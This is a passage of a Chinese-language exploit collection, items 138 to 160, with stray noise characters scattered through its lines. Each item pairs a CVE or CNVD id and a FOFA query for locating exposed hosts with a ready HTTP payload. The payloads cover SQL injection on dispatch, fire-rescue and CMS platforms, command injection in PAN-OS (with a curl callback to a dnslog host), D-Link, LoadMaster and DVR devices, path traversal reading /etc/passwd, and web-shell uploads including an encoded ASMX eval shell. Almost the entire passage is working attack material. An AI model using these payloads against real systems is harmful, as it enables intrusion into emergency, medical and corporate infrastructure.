* f0 W. M6 A$ E6 c1 o( @% mFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
3 {. w4 U) C4 L2 ]* ~/ p7 M4 e+ s! bGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1% U; u* T# p4 b% p0 ]+ p
Host: x.x.x.x
( }7 `" p0 L% U( j9 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.01 U6 `& ~* O. W7 D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& ^+ l' Q! v, H7 G! I& @/ E2 T" l% X& `8 HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% X- j/ P3 \8 H" N5 C. lAccept-Encoding: gzip, deflate, br" c) P7 E% M& K% Z; _( N
Connection: close
' H/ a/ u2 e* W1 P  J2 q/ \Upgrade-Insecure-Requests: 1
8 \, |7 I/ Z* T5 X1 G+ s- ^' F4 [& B% Y2 ]
: ^7 |6 @' d$ k) q/ K  O
139. 福建科立讯通信指挥调度平台editemedia.php sql注入$ m2 J. \" Y+ `. L" ^' H/ q! c
CVE-2024-2622
6 a6 J$ a, y/ B, W( B7 T) t  NFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
5 n4 N" U" `8 s, _' r$ }! k' QGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
  h3 l. f& ?# r6 A/ C+ p# O1 oHost: x.x.x.x9 |* N! H# }3 E6 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 h4 g0 {) I  A- E# V' I  [, [: |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- @: ]4 f2 U1 F1 ?0 H: c# o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! f$ f/ O" Z5 @2 C5 m
Accept-Encoding: gzip, deflate, br1 f- {- a' @& ~& n
Connection: close- V5 j& q# R* ]' _' G
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
9 A# _# P0 g5 A7 PUpgrade-Insecure-Requests: 1
# L, @2 j  d. X) k; f
& e! U! W; L# @
9 t" Y3 B7 n( B( C6 y4 J140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
' a; a% k! ~% E4 X4 aCVE-2024-2566$ G& m2 w' P8 `8 N. o
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
1 b3 z6 i  _2 e3 iGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
) s2 p9 e% k- O3 K6 f1 aHost: x.x.x.x
2 U6 K" }( @1 E" ?& i( x; v+ q& ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; q' q, s* n! z: L( u" m5 Q) r; _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. O# }9 h; W' d+ M! W' MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ y$ r% R% w, T/ n' Y- ?- c
Accept-Encoding: gzip, deflate, br
9 _/ E+ |; O4 e6 S) u/ Z5 RConnection: close
8 R8 S2 b, d8 ~- eCookie: authcode=h8g9
& z3 E5 o; ]9 h. V% m" aUpgrade-Insecure-Requests: 1" s) ]8 K$ M( `
6 q4 i$ l- a% ], D
& B9 s/ M  ^) X0 P; _
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入, G- j- o5 X2 r
FOFA:body="指挥调度管理平台") z7 T- [3 @5 }# A( g  P
POST /app/ext/ajax_users.php HTTP/1.1$ ~* P1 C% d& B0 V
Host: your-ip
% O: A3 x4 T" ~/ C" C8 {- X& P. F! kUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info8 `1 v7 P; H2 W1 x, @1 s' H
Content-Type: application/x-www-form-urlencoded4 ^4 D5 s9 O& }
# |) x, \9 ?! ?

' ]5 p7 c/ K% S- pdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
; n4 [& [; i: b; ^9 `
- P/ s) U9 m; l& |% J1 v3 u2 ~. N* |
142. CMSV6车辆监控平台系统中存在弱密码; H6 P9 \9 E6 B" J( E
CVE-2024-29666# l" y% P. [; `8 D! K* ]
FOFA:body="/808gps/", G6 ~. d0 X( |
admin/admin
  e- U8 P/ R, t5 T143. Netis WF2780 v2.1.40144 远程命令执行/ u6 l5 E* V9 q; v9 ^
CVE-2024-25850' C% P" ~5 ~$ q* G
FOFA:title='AP setup' && header='netis'; C! ]+ q( h8 V
PAYLOAD
/ X' Z3 X# r# @( V3 f% g; a9 o7 k, |3 t: G7 z
144. D-Link nas_sharing.cgi 命令注入, J- V4 N) O" Z) s1 K
FOFA:app="D_Link-DNS-ShareCenter"
+ e/ \$ c  i& q' Msystem参数用于传要执行的命令
/ |9 J  g( n) H- K% p  u, w- yGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
9 d+ B: T! M# g: vHost: x.x.x.x" ^7 o3 @' U9 I( D% @8 ?- Q0 \) ^* L5 C
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
1 T# @4 s8 L/ p5 R: k* N7 VConnection: close- l# _; r; U: t7 V' f
Accept: */*5 ?" r  M' m9 p; L5 r
Accept-Language: en
' U: ^# _0 |5 RAccept-Encoding: gzip
0 o% y  Z% m0 e, r" [3 [/ H3 h+ ]( \$ R! L, H' ~

8 ^1 c: x  ]# l- [9 O. O) x/ o145. Palo Alto Networks PAN-OS GlobalProtect 命令注入+ @5 E* I/ g' w& |! L; ?
CVE-2024-3400
# m' L; N: x0 fFOFA:icon_hash="-631559155") b2 I: I6 z( O9 o) R8 w0 b6 [! e
GET /global-protect/login.esp HTTP/1.1  k  G9 M1 x% n- M# b1 [
Host: 192.168.30.112:1005
3 \0 T- G' E! H  B4 M+ HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84- l% }' k) _4 y+ f/ P; i, [1 G
Connection: close6 _) G4 P8 n6 U! o$ i( ~, X1 v/ J
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;; n5 B0 I' b! r, e; x$ a
Accept-Encoding: gzip- a7 Q$ l" W* {9 `' l# k
" Z8 ~1 }- R" G6 ?/ Z* Y# n, I
) @1 N% C/ Q1 B9 i
146. MajorDoMo thumb.php 未授权远程代码执行0 V7 F7 @3 q9 F9 D) I0 s
CNVD-2024-02175$ R2 C+ n  |+ t, c9 f9 J
FOFA:app="MajordomoSL"
1 A4 T' g. l. h2 z% m1 V( LGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
1 k- E4 P& H4 R# [7 T5 h3 b6 XHost: x.x.x.x8 T. S1 r0 R1 V4 Y, @* a) O* ^: S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.845 j$ g0 G# u( O( c
Accept-Charset: utf-8
4 w- I: A2 |" K, T- |+ v! @  S" ?Accept-Encoding: gzip, deflate) D8 Z/ M% m- p$ x4 x
Connection: close
( P& K( f! T. V) f1 l* [& L( d$ F& A! P1 I0 Q) K
4 P+ a8 m% V9 m2 K" E' X& k1 @; I' c
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历, z  c2 [. O7 q3 _) g
CVE-2024-32399
9 Y8 O# S3 c, ^( ~$ u* _5 bFOFA:body="RaidenMAILD"/ N5 U1 C8 c0 }
GET /webeditor/../../../windows/win.ini HTTP/1.1
0 g9 u4 q# `" H6 ]3 b8 g- AHost: 127.0.0.1:81
+ {, V1 h7 l8 E. [  fCache-Control: max-age=0
2 |/ ]2 E1 o7 |$ uConnection: close# R. ~9 ^# t& j8 g
2 ^+ k& L5 q; @1 G( R
) Y$ h9 y  g8 M' I1 ?! P$ G( Q  w
148. CrushFTP 认证绕过模板注入
& @* _3 A0 T! w& i, ?' G% z& l4 [CVE-2024-40406 q7 h6 @" {7 c  t* f9 f& g, N! Z
FOFA:body="CrushFTP"3 z  w2 Z" ~3 C
PAYLOAD
6 D- M+ u, e! V/ y' d# X0 s, T, J9 s, T: K- I
149. AJ-Report开源数据大屏存在远程命令执行
# l! m9 l0 B& H; B6 zFOFA:title="AJ-Report"2 z+ s: ]( P; [2 [" P
3 ?2 X+ q4 h- y( i1 L! a) x0 r. i
POST /dataSetParam/verification;swagger-ui/ HTTP/1.12 r4 K0 P5 ^* b6 E& s  y' W( a1 i
Host: x.x.x.x8 M" O4 @4 L, e/ K4 P, O0 ]# F( c+ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 c, w1 j5 q4 l$ I2 j. kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. t8 A( Z! ?/ @
Accept-Encoding: gzip, deflate, br
+ R. o" V0 U6 M$ B+ N& _! ]& lAccept-Language: zh-CN,zh;q=0.9" w! a% `1 e6 L
Content-Type: application/json;charset=UTF-8  [% r% C  k+ `+ i. |
Connection: close# c5 b- K9 u3 j! K, m

' a' ~1 ]1 X, r- W; h{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}! k$ T4 w. K1 N) u
4 r! L1 U# }, D, |# w, |+ h$ R1 Y
150. AJ-Report 1.4.0 认证绕过与远程代码执行
0 R+ `. V& @3 Q+ }FOFA:title="AJ-Report"
* d# ~( x( R- ^  \+ [3 ^POST /dataSetParam/verification;swagger-ui/ HTTP/1.17 F1 ?  ^, Z5 R  m# r% \
Host: x.x.x.x+ G( N" _; T8 H; i( ^8 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( B: A& s" V5 w0 ^" O; O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 u# d# @5 }9 h3 w: i# \
Accept-Encoding: gzip, deflate, br5 r* |8 `/ V; r* ~0 q
Accept-Language: zh-CN,zh;q=0.9
- Z2 k, s( y! K! J" U5 Y4 s% CContent-Type: application/json;charset=UTF-8
* t7 N* Q9 A" V, O- F4 ZConnection: close
. o/ e7 o7 H6 U; F' K7 A' XContent-Length: 339) h2 c7 U* @( m0 V
" _0 V6 R1 _: y8 Y& J, h
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
; U( P) d3 o8 v1 Z( v: B% l5 @  v- w* y" _. k
+ ?: S0 u, D9 I8 t
151. AJ-Report 1.4.1 pageList sql注入" @% }2 q, \7 X) O; z
FOFA:title="AJ-Report"% Q$ L7 B1 s5 U6 @% d- K
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
1 p1 Y& R! U( u  ^1 _1 p# |4 EHost: x.x.x.x
. J5 n! G3 i. J* G6 f9 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  j! s. n: X. Y& BConnection: close! b' E' K% F2 R9 W3 `
Accept-Encoding: gzip( b# S  ?9 K$ }5 e0 f6 O
- M( s- O: _6 a* M0 C
7 T% n: d: A0 e( G3 ]) ]( K
152. Progress Kemp LoadMaster 远程命令执行( r- @: \9 d" [
CVE-2024-12122 W  a3 m  C' \+ y
LoadMaster <= 7.2.59.2 (GA)
1 R" S' Q. x9 ]7 H2 j4 {5 s+ uLoadMaster<=7.2.54.8 (LTSF)
# \2 e/ I) s" L; e( ?) T$ J% H6 zLoadMaster <= 7.2.48.10 (LTS)
: R9 {, |! Q! l2 L  AFOFA:body="LoadMaster"
( e5 o5 q7 {" G" sJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码: l8 z9 G7 O8 b: o/ l, d5 X
GET /access/set?param=enableapi&value=1 HTTP/1.11 S2 l$ ?0 T4 i& y4 ^* {5 i) H
Host: x.x.x.x" i' f8 T' i2 G4 D8 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.16 h7 c% v, x$ D
Connection: close# `4 r  u! A4 W. ~/ x
Accept: */*
- l" x$ W, z% o$ W: eAccept-Language: en
  }+ u) Q" g7 G9 Q4 ]% r/ nAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=# q2 S' r7 a* i9 F3 s' z
Accept-Encoding: gzip  [% g, u1 E  O$ }

7 Y8 p* H, J: h2 ~8 s
( ]' _# J) W% s: q$ w) D153. gradio任意文件读取
4 }" R0 n& m$ a; \: i& g7 FCVE-2024-1561FOFA:body="__gradio_mode__"
% A% f3 a7 v' X# K7 ^" \- x$ Y第一步,请求/config文件获取componets的id  \2 P1 o# _3 \5 k; o. I
http://x.x.x.x/config
6 N5 h5 g% ^' z% C! s! d* N& x: c* o3 m1 X% n" N3 j9 L' t: O, _

- _% i' l* U. F. r, x/ l第二步,将/etc/passwd的内容写入到一个临时文件9 p* h8 q" T8 x" `
POST /component_server HTTP/1.1) m) L6 ?: T: P/ V2 J+ R3 D
Host: x.x.x.x
, }( ]4 N2 V% s: P# f, g. ]* h! HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
; j4 v0 H+ p, c; f7 WConnection: close6 y2 D# D7 r  O! u2 e" z. Z+ T2 U
Content-Length: 115- E* c+ V" C  x5 e  V- I2 o
Content-Type: application/json
9 d" O& H1 d) N' P6 ^7 B6 wAccept-Encoding: gzip
' J! J  b! b  i# m" O
( B1 f0 e3 Z1 j$ o% [/ `{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}$ ]0 z/ Z- E8 g# q& N5 c3 Y/ m; ?
! ]: {4 r8 D5 R5 s0 C
1 q* ]0 T" m5 h
第三步访问
1 L6 m' l# r/ a4 e- Y3 Y; H; M, Hhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd3 F4 e9 P* I3 W* E- [

7 I( x6 p* F- ?2 y% m+ N/ W
1 P5 Z- X# Y! n1 s2 A8 W7 t154. 天维尔消防救援作战调度平台 SQL注入. O1 h' R' I. F( Z5 c& i) [6 s
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"3 m( q6 n: I0 _& v; F7 E
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
4 u7 H5 E7 A. }5 K+ N- ZHost: x.x.x.x
. K# s7 |3 P% T( I+ ZContent-Length: 106
# t1 C9 ~% j  G; h% V, [- S9 ^Cache-Control: max-age=0
8 P) ]1 W$ h/ a' ]3 `6 A# qUpgrade-Insecure-Requests: 1
0 V# U& N0 G! B' kOrigin: http://x.x.x.x1 A5 G3 e9 I0 k' L% p& z  w
Content-Type: application/json
; I" U1 m$ U( o: Z* U: AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36* C3 b$ {9 e3 C8 A$ L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  r3 v+ t! s$ W0 Z6 \
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
: z4 b9 u. C6 e$ A0 NAccept-Encoding: gzip, deflate9 J& c" [3 Z7 e# g; V! H
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.74 I! F0 v9 y! G# w% {5 f. k# l
Connection: close
7 T, w' g3 ?# l' C) F0 q
+ E9 |6 }6 A/ Z{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}: |* \9 O3 O8 \6 V& V8 L. ~

3 t- k; E5 U- c+ q  b/ |  b
) t0 d0 l8 J& C7 O3 r: u155. 六零导航页 file.php 任意文件上传; c/ F/ Q' G  j, d( D
CVE-2024-349825 j2 l% Y) E' V7 j$ G
FOFA:title=="上网导航 - LyLme Spage"
# d! n3 P0 A5 F8 MPOST /include/file.php HTTP/1.1
$ W+ Z9 k2 P8 y( zHost: x.x.x.x' `# K3 O2 }9 L/ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 B8 W% O1 m2 g. j; |3 E# ]; ]# BConnection: close
2 X) _* i. U! V4 @- q" X# F$ uContent-Length: 232. a) `4 e0 q8 u4 g1 v4 H2 |, t
Accept: application/json, text/javascript, */*; q=0.01+ E' ]. r5 I& F9 z
Accept-Encoding: gzip, deflate, br
# m! T* ]" r8 z- ^! |. y' fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 a2 S2 n- ]  q& l. M% b
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
6 A& O  U: z6 T' S. A# o5 @* t5 q  ^7 nX-Requested-With: XMLHttpRequest0 y) o; `: _; p4 \0 Z  q7 W7 d7 W

% _/ I+ r8 Q, s5 b-----------------------------qttl7vemrsold314zg0f
& w6 ~! d8 X6 ]. XContent-Disposition: form-data; name="file"; filename="test.php"/ e8 @$ w  `  e7 V3 m: k  Q! W4 J" F+ w
Content-Type: image/png
5 i0 i- i8 e5 U/ t
1 v9 F% Y) q- x2 P+ C# @" p<?php phpinfo();unlink(__FILE__);?>0 T9 C# a# e3 s( J  a3 x
-----------------------------qttl7vemrsold314zg0f--
! ~$ B5 Z+ _: r. n
! J5 L7 E) A: C& G! ?$ Y
9 O  B+ G: e2 L9 w" t/ }  b访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
4 E& Y( I3 T" d; r( T+ u9 ]; ~; K8 {6 @$ I  ?2 B" }+ F
156. TBK DVR-4104/DVR-4216 操作系统命令注入) v1 N0 V! P; c$ z$ t% y5 ~% N
CVE-2024-3721  C8 @) Y+ _# _0 s
FOFA:"Location: /login.rsp"4 ?7 n  Y0 e& c) ?  j4 O
·TBK DVR-4104- c7 S) l% Y; w3 |
·TBK DVR-4216
; J. Q0 n9 A  B: ~curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"$ a1 m' c! b' S, h% o: S8 u5 h# A4 c

: B, S# l( J4 u) T
6 D, J, Z7 n* o1 o# ?/ l( pPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
1 Q7 `+ p( k/ u, T4 ?5 \3 [  r& ^Host: x.x.x.x
& K0 I) g' H4 J& `  |( dUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' q  @( |$ u' uConnection: close
/ \2 l; T  t2 E2 d( \* ]Content-Length: 0
; s7 O: o5 ]) D% K5 E% jCookie: uid=1  r& k0 ~' d+ R. j$ n0 L
Accept-Encoding: gzip
3 b8 B: D7 g0 p' a
2 i; V* h( i( O' Y! K% H, \! O3 m7 v9 @0 Y
157. 美特CRM upload.jsp 任意文件上传) B2 {/ M" F4 W+ f+ k2 o
CNVD-2023-069713 x/ Y; W% t; K8 X" |
FOFA:body="/common/scripts/basic.js"$ w+ W& \6 A" ?3 n  q% k
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
) A9 S0 T3 l$ c1 X. E9 ]$ Z( Q: x: x6 d) \Host: x.x.x.x
& H) D2 Z" b: C: i4 r1 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
% n7 M9 @- ?6 z+ rContent-Length: 709
! j" i  Z  [# E8 d6 |* ?! ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) B# s' X. \3 r. _4 O
Accept-Encoding: gzip, deflate( M& h; B3 G  D8 L* r) ?/ H, J
Accept-Language: zh-CN,zh;q=0.9
- i" \  G# Q& @7 f" o+ b" DCache-Control: max-age=0
0 Z9 a  i: h! O% k1 B( T! AConnection: close" ~5 C2 {8 Y4 {3 P( t1 U* D6 H$ S% U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN5 `/ z) V% c* l8 H9 U
Upgrade-Insecure-Requests: 11 q  M) @, [- F6 _" P7 h8 s' k5 L

4 F1 A) U1 p( q/ D$ g* X------WebKitFormBoundary1imovELzPsfzp5dN% y  D* s7 m% X
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"/ A9 U$ R& b/ r% P( O' _6 f
Content-Type: application/octet-stream  L/ z) `$ e1 p  w. ~

8 F) _; j) b* j& m' Jnyhelxrutzwhrsvsrafb
, z8 f4 n9 p. v, e! K% ~7 L------WebKitFormBoundary1imovELzPsfzp5dN  `. U  d$ U2 C, c6 r
Content-Disposition: form-data; name="key", a: b1 e2 o/ T* ~7 A+ @

# B* W1 r* I1 z# dnull! W: i$ V9 {, A- k
------WebKitFormBoundary1imovELzPsfzp5dN
8 |; I: Q: t+ e7 G  @9 rContent-Disposition: form-data; name="form"
7 t' S. ?0 P- V/ E
! s3 K3 l% y$ s5 n& y7 Z6 L- hnull
& E0 d* V6 N0 n# T6 g) Y5 o------WebKitFormBoundary1imovELzPsfzp5dN$ K+ q6 n& w* m6 H' l' F/ C
Content-Disposition: form-data; name="field"6 ~" U4 s3 z9 o+ e7 |4 x. \+ @
4 {" U! j* h/ ~* _9 X
null
) l4 y! R- s& s------WebKitFormBoundary1imovELzPsfzp5dN7 ]- A8 C" c$ ]) ]4 f" J
Content-Disposition: form-data; name="filetitile"& [8 P' [, o1 r; C5 i

9 k! X: e& e9 C8 _# T3 v! Mnull
5 l. d2 s5 @' M: j  y) }: z  s6 d------WebKitFormBoundary1imovELzPsfzp5dN
7 w- z2 T, j) i3 W- S8 G( wContent-Disposition: form-data; name="filefolder"
( c6 \* u5 m- ?; p
, H5 e$ u/ M8 D  y! onull( O# v5 B% m4 K3 [& l! s( \& @9 s
------WebKitFormBoundary1imovELzPsfzp5dN--
5 O' S  ]' @+ e- g8 P6 Q
1 t. _/ L2 a( s( U7 K" L3 ^- n8 q2 d# z5 ~$ P3 J* P& w" \
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
. m0 b, |$ T" V0 {
4 D: @7 \( H8 l  w158. Mura-CMS-processAsyncObject存在SQL注入& v. O# s. C; Y
CVE-2024-326404 ~6 f7 z+ j# a9 a
FOFA:"Generator: Masa CMS"( i( m5 g" R# _
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1( q/ X1 k6 `- K  e7 s# S
Host: {{Hostname}}
" A( o) u% m9 @! \7 Y1 j: U, sContent-Type: application/x-www-form-urlencoded
/ z& Z! E4 }% W/ B
) ]$ z- d) p7 I4 Gobject=displayregion&contenthistid=x\'&previewid=1/ R, |$ S+ Q: W
; ?! `5 s3 V1 U: z3 P: C+ Z
4 \& ~3 Z% c' z2 m. X: C8 m/ Z9 b
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
3 q) c2 S3 z$ l- P( F, F5 rFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")% |' M( U% F8 U$ h9 _3 U
POST /webservices/WebJobUpload.asmx HTTP/1.1
$ j! ~  Q- [, Y) ]% `$ vHost: x.x.x.x& I4 y' I; `$ s4 V: |) b. J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
5 q' \- j8 J) J- l+ X4 B' j3 zContent-Length: 10805 R+ e+ q  o2 O4 S& g, Q
Accept-Encoding: gzip, deflate
1 s/ z8 k1 ]& s3 \& I& i3 [# WConnection: close
9 R; g! |: H6 J! L4 j& w" vContent-Type: text/xml; charset=utf-8
! x3 y9 x  G3 g7 b4 M% aSoapaction: "http://rainier/jobUpload"9 R( G' K6 u. `0 d+ j6 h1 e
0 M' R2 W, v$ B% ^* `3 Q
<?xml version="1.0" encoding="utf-8"?>
7 U& O& K! s6 F" I9 H0 O<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">( T; W2 X* y9 C6 W4 l9 K- H
<soap:Body>  X( K7 C) D2 R5 @& J" L- M; e: v: D8 {
<jobUpload xmlns="http://rainier">
  h1 o5 ?) y- s# K( v6 U8 ^. y<vcode>1</vcode>
- _2 n0 ?" k9 u& p( T<subFolder></subFolder>( V: p1 q3 _6 ~+ C
<fileName>abcrce.asmx</fileName>+ N, k3 d& V1 M1 k. g# `# y5 V9 l
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>; S; ]8 X' K, X* |( I
</jobUpload>- d; \- X: j. |
</soap:Body>3 P6 G$ B7 A7 |+ {+ H
</soap:Envelope>
; g' D! E8 y8 F5 K7 T4 ?& H& S2 G" q
# u% Q2 G. Y1 t$ E& V. T. n- K, ]4 A( N7 R! w: a( O* c! a
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
7 V! r' e) Z4 n  V' J
0 Z) ?; D$ m* e. u  y# u( q& o8 k9 _
160. Sonatype Nexus Repository 3目录遍历与文件读取
/ ~* Q3 H# O) OCVE-2024-49567 i- Q- r+ j. V# T% Y* n1 b
FOFA:title="Nexus Repository Manager"% P% H1 S8 x! y, d
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1& x$ s; ~  y! T3 N' |
Host: x.x.x.x
/ }3 s2 k: O5 z# s2 _User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.00 N+ l( C$ Q/ n9 k+ k6 |7 f
Connection: close
